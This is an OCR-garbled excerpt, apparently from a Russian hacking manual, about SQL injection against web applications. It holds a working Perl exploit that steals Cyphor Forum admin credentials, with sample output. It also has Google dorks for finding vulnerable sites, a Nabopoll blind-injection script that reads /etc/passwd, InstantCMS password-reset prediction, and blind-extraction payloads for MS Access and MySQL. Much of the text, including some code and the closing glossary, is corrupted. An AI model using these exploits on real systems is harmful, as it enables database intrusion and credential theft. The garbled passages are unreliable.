http://www.securiteam.com/unixfocus/6P00FlFEKC.html.

- , ,
cyphor019.pl. , ,
$url, users cyphor_users.
. , $url
, .
#!/bin/env perl

#//-------------------------------------------------------------------#
#// Cyphor Forum SQL Injection Exploit .. By HACKERS PAL
#// Greets For Devil-00 - Abducter - Almaster
#// http://WwW.SoQoR.NeT
#//-------------------------------------------------------------------#
use LWP::Simple;

print "\n#################################################";
print "\n#   Cyphor Forum Exploit By : HACKERS PAL       #";
print "\n#   Http://WwW.SoQoR.NeT                        #";
if(!$ARGV[0]||!$ARGV[1]) {
    print "\n# -- Usage:                                     #";
    print "\n# -- perl $0 [Full-Path] 1                      #";
    print "\n# -- Example:                                   #";
    print "\n# -- perl $0 http://www.cynox.ch/cyphor/forum/ 1#";
    print "\n# Greets To Devil-00 - Abducter - almastar      #";
    print "\n#################################################\n";
    exit(0);
}
else
{
    print "\n# Greets To Devil-00 - Abducter - almastar      #";
    print "\n#################################################\n";
    $web=$ARGV[0];
    $id=$ARGV[1];
    $url = "show.php?fid=2&id=-1%20union%20select%20id,2,3,4,5,nick,password,8,id,10%20from%20cyphor_users%20where%20id=$id";
    $site="$web/$url";
    $page = get($site) || die "[-] Unable to retrieve: $!";
    print "\n[+] Connected to: $ARGV[0]\n";
    print "[+] User ID is : $id ";
    $page =~ m/<span class=bigh>(.*?)<\/span>/
        && print "\n[+] User Name is: $1\n";
    print "\n[-] Unable to retrieve User Name\n" if (!$1);
    $page =~ m/<span class=message>(.*?)<\/span>/
        && print "[+] Hash of password is: $1\n";
    print "[-] Unable to retrieve hash of password\n" if (!$1);
}
print "\n\nGreets From HACKERS PAL To you :)
\nWwW.SoQoR.NeT ... You Are Welcome\n\n";
#finished


.^

.
html-, <span class=bigh>
</span> ( ) , <span
class=message> </span> .

perl cyphor019.pl http://localhost/webexploitation_package_02/cyphor/ 1
, ,
( 1).
. 4.1.

bt tmp # perl cyphor019.pl http://localhost/webexploitation_package_02/cyphor/ 1

# Cyphor Forum Exploit By : HACKERS PAL
# Http://WwW.SoQoR.NeT
# Greets To Devil-00 - Abducter - almastar #

[+] Connected to: http://localhost/webexploitation_package_02/cyphor/
[+] User ID is : 1
[+] User Name is: admin
[+] Hash of password is: ad4ERM.YJ7j9A

Greets From HACKERS PAL To you :)
WwW.SoQoR.NeT ... You Are Welcome

Fig. 4.1. SQL- Cyphor


SQL-
.

SQL-
MS SQL Jet

,
.
1. Google:
s it e :.o r g i n u r l : .asp?id=*
site:.com i n u r l : .aspx?*
s i t e : . co.uk i n u r l : .asp?cid~

- .
2. , http://www.site.com
:
http://www.site.com/en/pressread.asp?id=563
. URL
, :
http://www.site.com/en/pressread.asp?id=563'
:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in
string in query expression 'id=563''.
/en/includes/configdb.asp, line 23

,
, AND+1=1:
http://www.site.com/en/pressread.asp?id=563+AND+1=1#
ASP # ,
-- /*.

type mismatch Cint


, .
, ,
, . AND+1=0#:
http://www.site.com/en/pressread.asp?id=563+AND+1=0#


:
ADODB.Field error '800a0bcd'
Either BOF or EOF is True, or the current record has been deleted.
Requested operation requires a current record.
/en/pressread.asp, line 44

To ,
ORDER BY . , , 10.
, :
Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC Microsoft Access Driver] The Microsoft Jet database
engine does not recognize '10' as a valid field name or expression.
/en/includes/configdb.asp, line 23
, 10 .
, .
7:
http://www.site.com/en/pressread.asp?id=563+AND+1=0+UNION+ALL+SELECT+
1,2,3,4,5,6,7#
:
Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC Microsoft Access Driver] Query input must contain
at least one table or query.
/en/includes/configdb.asp, line 23
,
. :
http://www.site.com/en/pressread.asp?id=563+AND+1=0+UNION+ALL+SELECT+
1,2,3,4,5,6,7+FROM+user#
,
:
Microsoft OLE DB Provider for ODBC Drivers error '80040e37'
[Microsoft][ODBC Microsoft Access Driver] The Microsoft Jet database
engine cannot find the input table or query 'user'. Make sure it
exists and that its name is spelled correctly.
/en/includes/configdb.asp, line 23
, , ,
: user, users, admin, login, news, sysobjects, customers. ,
admin. ,
,
, , :
http://www.site.com/en/pressread.asp?id=563+AND+1=0+UNION+ALL+SELECT+
1,2,3,4,5,6,7+from+admin#


3. , GROUP
BY ... HAVING, :

HAVING 1=1 --
GROUP BY field1 HAVING 1=1 --
GROUP BY field1, field2 HAVING 1=1 --
...
GROUP BY field1, field2, ... field(n) HAVING 1=1 --



nabopoll.php

06,
, .
, .
, . :
<?
# Nabopoll Blind SQL Injection Exploit
# Download: www.nabocorp.com/nabopoll/
# coded by sOcratex
# Contact: sOcratex@hotmail.com
# July 1. 2010 - modified by Uri
error_reporting(0);
ini_set("max_execution_time".0);
$srv - "localhost"; $path = ,7webexploitation_package_02/nabopoll";
$port = 80:
:
Ssurvey = "1"; //you can verify the number entering in the site
and viewing the re su lts ...
echo
\n ";
. .., 4
echo "Nabopoll SQL Injection -- Modified Exploit\n";
echo "......................................................................................-\n\n";
echo " -- /etc/passwd: \n:
$j - 1; $user - "";$x-0;
while(!strstr($user.chr(0))){
Sminx 0: Smaxx = 255;
$found = false; Sop - ">";
whi 1e( !$found) {
$x - intval(($maxx + Sminx)/2);
if (Smaxx == $minx+l) {
if (Sop == ">") { Sx-Smaxx; $found=true;$user.=chr($x);echo chr(Sx):break:}
if ((Sop
and (Sbingo)) { Sx=Smaxx; Sfoundtrue;$user.=chr(Sx);
echo chr(Sx);break;}
Sbingo = false;
Sxpl - 7result.php?surv-".Ssurvey."/**/AND/**/l-(
SELECT/**/( IF((ASCII(SUBSTRING(1oad_fi1e(
0x2f6574632f706173737764)S j.", 1 ))".Sop.Sx.").1.0)))/*";
Scnx - fsockopen(Ssrv,Sport);


fwrite($cnx."GET ".S path.S xplH T T P /1.0\r\n\r\n");


whi 1e ( !feof($cnx)){ 1f(ereg(power", fgets($cnx))){

Sbingo-true;break; } }
fclose(Scnx):
i f (Sx255) {die(H\n Try again../);}
Sprevop-Sop;
1f (Sbingo) {
switch(Sop)
{

case
Sminx Sx;
break;
case
Smaxx - Sx;
break;
}

else
switch(Sop)
{

I : I

case
break;
case

w uvm

m &

'*

break:
}

Sj++;
}

echo "\n";
?>

, , -
( , , Sxpl-),
.



SQL- MS Access

:
[...] AND (SELECT TOP 1 1 FROM _)

:
[...] AND (SELECT TOP 1 1 FROM users)

:
AND (SELECT TOP 1 _ FROM _)

:
[...] AND (SELECT TOP 1 name FROM users)

:
[...] AND IIF((SELECT TOP 1 LEN(_) FROM _) = X, 1, 0)

:
[...] AND IIF((SELECT TOP 1 LEN(name) FROM users) = 8, 1, 0)

:
[...] AND IIF((SELECT TOP 1 MID(_, X, 1)
FROM _) = CHR(_), 1, 0)

:
[...] AND IIF((SELECT TOP 1 MID(name, 1, 1)
FROM users) = CHR(65), 1, 0)


instantCMS
The matrix,
,
.

https://forum.antichat.ru/showpost.php?p=2138088&postcount=23
, ,
http://ifolder.ru/17669676
http://webfile.ru/4490132

.
( )
.
? /components/registration/frontend.php :
$sql = "SELECT * FROM cms_users WHERE email = '$email' LIMIT 1";
$result = $inDB->query($sql);
if ($inDB->num_rows($result)>0){
    $usr = $inDB->fetch_assoc($result);
    $newpassword = substr(md5(microtime()), 0, 6);
    $inDB->query("UPDATE cms_users SET password = '".md5($newpassword)."' WHERE id = ".$usr['id']);
    $mail_message = $_LANG['HELLO'].', '.$usr['nickname'].'!'."\n\n";
    $mail_message .= $_LANG['REMINDER_TEXT'].' '.$inConf->sitename.'.'."\n\n";
    $mail_message .= $_LANG['YOUR_PASS_IS_MD5']."\n";
    $mail_message .= $_LANG['YOUR_PASS_IS_MD5_TEXT']."\n\n";
    $mail_message .= '########## '.$_LANG['YOUR_LOGIN'].': '.$usr['login']."\n";
    $mail_message .= '########## '.$_LANG['YOUR_NEW_PASS'].': '.$newpassword."\n\n";
    $mail_message .= $_LANG['YOU_CAN_CHANGE_PASS']."\n";
    $mail_message .= $_LANG['IN_CONFIG_PROFILE'].': '.cmsUser::getProfileURL($usr['login'])."\n\n";
    $mail_message .= $_LANG['SIGNATURE'].' '.$inConf->sitename.' ('.HOST.').'."\n";
    $mail_message .= date('d-m-Y (H:i)');
    $inCore->mailText($email, $inConf->sitename.' - '.$_LANG['REMINDER_PASS'], $mail_message);

.
?
1. , .
2. , ,
, microtime().
microtime .
,
gettimeofday().
msec sec, sec ,
Unix (The Unix Epoch, 1 1970, 00:00:00 GMT),
a msec . - :
. [1273589840]

,
, Unix.
?
, .
- :
. 11 May 2010 20:39:23 GMT

, 1970, 00:00:00
GMT.
Vv i
, .
OjacaxcOO ( , Unix
). :
0.30001200 1273589840


( ).
substr(md5(value), 0, 6)

md5 hash
, :
1512


1 . .
| -.
. ,
11 : 1000000/11 90.909
. , ,
.
,
100-,
. ,
.


SQL-

() ,
SQL-.
, ,
(, md5 ). ,
, .
, ,
,
/etc/passwd. , . ,
( )
, ,
.
, ,
.
, ,
, , .
/etc/passwd
. , ,
(, ,
/etc/passwd ,
, ).
, ,
SQL-,
.


find_in_set(substr, strlist)
MySQL find_in_set(),
, .
, . ,


0.
MySQL ( 'c' 'a,b,c,d,e'):
mysql> SELECT FIND_IN_SET('c','a,b,c,d,e');
-> 3

15- :
0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f
:
select find_in_set((substring((select password from users
limit 0,1),1,1)),'0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f');

, ' 11. ,
1 16,
:
news.php?id=find_in_set(substring((select password from users
limit 0,1),1,1),'0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f')

,
.

.
1.
( , ).
2. find_in_set()
.
3. ,
, .
: 32+16 15-.
find_in_set() : INSTR(),
LOCATE(), ASCII(), ORD(), ASCII() ORD() ,
MySQL.

.
:
;
,
.
:
,
;

,
, .



find_in_set() + more1row
,

(, ).
Elekt.
, SQL-.
( podkashey)
SELECT 1 UNION SELECT 2

Subquery returns more than 1 row
ZaCo :
"" regexp concat("{1,25". if(@@version<>5 , }, 6}"))

/*

else

*/

MySql, 5,
#1139 - Got error 'invalid repetition count(s)' from regexp.
9 ,
regexp, 11
, .
SELECT 1 .
:
select if(1=1,(select 1 union select 2),2)
#1242 - Subquery returns more than 1 row
select 1 regexp if(1=1,"x{1,0}",2)
#1139 - Got error 'invalid repetition count(s)' from regexp
select 1 regexp if(1=1,"x{1,(",2)
#1139 - Got error 'braces not balanced' from regexp
select 1 regexp if(1=1,"[[:]]",2)
#1139 - Got error 'invalid character class' from regexp
select 1 regexp i f ( 1 = 1 , , 2 )
#1139 - Got error brackets ([ ]) not balanced from regexp
select 1 regexp if(1=1,"(({1}",2)
#1139 - Got error 'repetition-operator operand invalid' from regexp
select 1 regexp i f ( l - l , " , 2 )
#1139 - Got error 'empty (subExpression from regexp
select 1 regexp if(1=1,"(",2)
#1139 - Got error 'parentheses not balanced' from regexp
select 1 regexp if(1=1,"[2-1]",2)
#1139 - Got error 'invalid character range' from regexp
select 1 regexp if(1=1,"[[.ch.]]",2)
#1139 - Got error 'invalid collating element' from regexp
select 1 regexp if(1=1,'\\',2)
#1139 - Got error 'trailing backslash (\)' from regexp


find_in_set().
, , , 0.
:
select * from users where id=1 AND "x" regexp concat(
"x{1,25", if(find_in_set(substring((select passwd from users
where id=1),1,1),'a,b,c,d,e,f,1,2,3,4,5,6')>0, (
select 1 union select 2), "6}"))
'...d..f . 1,2.3 . 4 . 5 . 6',
:
#1242 - Subquery returns more than 1 row

#1139 - Got error 'invalid repetition count(s)' from regexp
To ,
. ,
.
15- ,
[0-9, -f]. ,
12 (11 , ). , :
[1] '0'
[2] '1'
[3] '2'
[4] '3'
[5] '4'
[6] '5'
[7] '6'
[8] '7'
[9] '8'
[10] '9'
, ,
, .
2- 11-,
. 1,
-
:
[1] '0
[2] *
[3] '
[4] 'd
[5] '
[6] f
SQL .


1. .
2. ,
.
3. , ,
, ,
1.
, , ,
[a-z, A-Z, 0-9] 11
.
,
,
,
.
, 42 md5 hash.
:
;
.
, ,
.

.
,
. 11 ,
,
. I!
, (,
, ).
-day
.
0-

. -.

jtr . .
(abend, aborption end) ,
(abort) () ,
^ (abuse)

,
,
.
(admin) ,

. .

(account) , ,
. .
(, ) ICQ (--), .
, (black hat) , ,
^


him | 1 Mitiiui f I *'#' *I ) ( BSD, Net BSD OpenBSD).

<V

n n i l n h i <!i nsii ( whitli 1!)


, in- ,
v ijmunii. vi 1 im, HiH>Kf; /.

|'(\1|(! Windows.

. (vilt*)

llydl'tt,

'l'IUw4

hht, Wh hat.)

, .

' & vomi


11 i limit'd @{1 of Service, DDpS)
It Of*t IV4villtaHllll
( u i (ItHllrtttnl)

John The Ripper,

,
, , .

( I ) ! Service, I >*S)

' |(11

Miiiiih Juvtt (

;.1JavaScript.

h;i D oS-.

* ( )

;>,

(inject)

, . .

(include)

(inclutliiiK)
. (include)

<, ,
,

(inject ion)
* ,
) , * ,
(I )
||||<

, .
.

() (keyboard)
' (1)
'


(code) , -

.
(coding) .
.
(core) .
netcat.
(crack) , -
.
(cool hacker) (
).
(lamer) , ;
, .
(.) Linux.
(log) (
).
(log-wiper) , (. ).
(login) .
.
( must die) - , ; MS Windows.
(malware) .
. .
(manual) ( -,
).
(must have) - ,
.
, ,
(mIRC) ,
.
MySQL.
(mail) , e-mail.
.
.
netcat ().
(nick, nickname) .
Unix- .

;>; ^


( null)

, , 6; * ,

- (mdl-byle, by to)
(nuke)

, .
. .


(<)S)

( public nplo.it) , ,
I , -day sploit.
(pass, password)
,

Python Python.

( )S/2 (|> I (
).
( to root)
,
( use)
( use)

, .

, -.

P IIP .

(root)

*nix .

root.

SunOS.

, (secure)

. .

<', .

(script kiddie)
-,
, , ,.
.

. .

SQL.


, (sniffer)
cookie).

, - (,

, - Solaris,
(soft) , ,
,
.
, (sploit) .
.
. .
ICQ (. ).
(tips) , .
(tricks) ( ).
. .
.
., . .
Linux ( ),
(user identification number, UIN) ICQ.
, .
(Frequently Asked Questions, FAQ)
.
(phishing)
.
, (flood) ,
FreeBSD,
. .
(hack) .
& (hacking) ,
-.
.
. .
(host) , , ,
,
,
. .


- (Internet worm), .
(shell) .
ICQ ,
.
(exploit) ,
.
( use) , . , . .
. .
(user) .
. .